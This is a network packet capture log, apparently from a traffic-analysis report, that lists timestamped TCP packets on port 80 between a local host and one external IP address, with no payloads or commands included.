Dec 19, 2024 08:52:38.184380054 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.184395075 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.184489012 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.184703112 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.184998989 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.185012102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.185164928 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.185313940 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.185595036 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.185873032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.186157942 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.186171055 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.186225891 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.186249971 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.186757088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.186772108 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.186785936 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.186897993 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.187649012 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.187661886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.187675953 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.187725067 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.188520908 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.188534021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.188546896 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.188599110 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.188828945 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.189405918 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.189419985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.189434052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.189572096 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.189573050 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.190340042 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.190355062 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.190368891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.190418959 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.191107035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.191119909 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.191133022 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.191185951 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.191190958 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.192055941 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.192070961 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.192085028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.192152023 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.192945004 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.192991018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.193005085 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.193018913 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.193052053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.193089008 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.193928003 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.193943024 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.193994045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.194034100 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.194037914 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.194838047 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.194852114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.194864035 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.194905043 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.195755005 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.195768118 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.195780039 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.195801020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.195847034 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.195854902 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.196705103 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.196719885 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.196733952 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.196806908 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.197607994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.197621107 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.197633982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.197719097 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.197724104 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.198523998 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.198537111 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.198549032 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.198560953 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.198600054 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.198621035 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.199388027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.199400902 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.199446917 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.199460030 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.200304985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.200319052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.200330019 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.200373888 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.200417995 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.201248884 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.201265097 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.201277018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.201288939 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.201329947 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.201541901 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.202075005 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.202088118 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.202099085 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.202131033 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.202914000 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.202934027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.202948093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.203013897 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.203016043 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.203856945 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.203869104 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.203881025 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.203893900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.203916073 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.203969002 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.204741001 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.204754114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.204765081 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.204796076 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.205640078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.205653906 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.205666065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.205723047 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.205724955 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.206468105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.206480026 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.206491947 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.206504107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.206501961 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.206620932 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.207284927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.207298994 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.207309961 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.207343102 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.207370043 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.208174944 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.208189011 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.208199978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.208384037 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.209132910 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.209146023 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.209156036 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.209167957 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.209187031 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.209237099 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.209924936 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.209939003 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.209953070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.210000038 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.210010052 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.210733891 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.210747957 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.210758924 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.210805893 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.211560011 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.211595058 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.211607933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.211618900 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.211716890 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.211998940 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.212464094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.212486029 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.212497950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.212538004 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.213273048 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.213314056 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.213325977 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.213335991 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.213360071 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.214148045 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.214190960 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.214204073 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.214215040 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.214255095 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.214287996 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.215046883 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.215060949 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.215071917 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.215095043 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.215914011 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.215935946 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.215948105 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.215997934 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.216032028 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.216761112 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.216773033 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.216784000 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.216794968 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.216820002 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.217014074 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.217612982 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.217623949 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.217636108 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.217688084 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.218477011 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.218489885 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.218501091 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.218556881 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.218600988 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.219306946 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.219326973 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.219340086 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.219351053 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.219378948 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.219407082 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.220217943 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.220228910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.220241070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.220298052 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.221072912 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221086025 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221096992 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221155882 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.221374035 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.221858978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221872091 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221883059 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221894979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.221935034 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.221940041 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.222774982 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.222788095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.222798109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.222862959 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.223603964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.223618031 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.223645926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.223651886 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.223833084 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.224457026 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.224477053 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.224488020 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.224499941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.224525928 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.224555969 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.225322962 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.225337982 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.225348949 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.225382090 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.226169109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.226181984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.226193905 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.226231098 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.226288080 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.227031946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227045059 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227056026 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227067947 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227107048 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.227150917 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.227885008 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227897882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227909088 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.227989912 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.228749037 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.228761911 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.228775024 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.228813887 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.228837013 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.229645014 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.229657888 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.229670048 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.229681015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.229707003 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.229751110 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.230453014 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.230465889 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.230477095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.230504990 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.231323004 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.231337070 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.231350899 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.231384039 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.231400013 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.232196093 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.232208967 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.232220888 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.232233047 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.232258081 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.232275009 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.233052969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.233064890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.233076096 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.233179092 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.233897924 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.233911991 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.233923912 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.233952999 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.233985901 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.234778881 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.234791994 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.234803915 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.234816074 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.234843016 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.234860897 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.235604048 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.235616922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.235630035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.235641956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.235677958 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.235711098 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.236452103 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.236464024 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.236475945 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.236526966 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.237339020 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.237354040 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.237365961 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.237387896 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.237426996 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.238149881 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.238164902 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.238204956 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.238214016 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.238225937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.238267899 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.239047050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.239061117 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.239073038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.239126921 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.239893913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.239907026 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.239919901 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.239959002 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.239991903 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.240756035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.240768909 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.240782022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.240794897 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.240818024 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.240855932 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.241590023 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.241604090 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.241616011 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.241668940 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.242456913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.242471933 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.242484093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.242518902 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.242630959 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.243370056 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.243383884 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.243396997 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.243411064 CET	80	49732	147.45.47.15	192.168.2.4
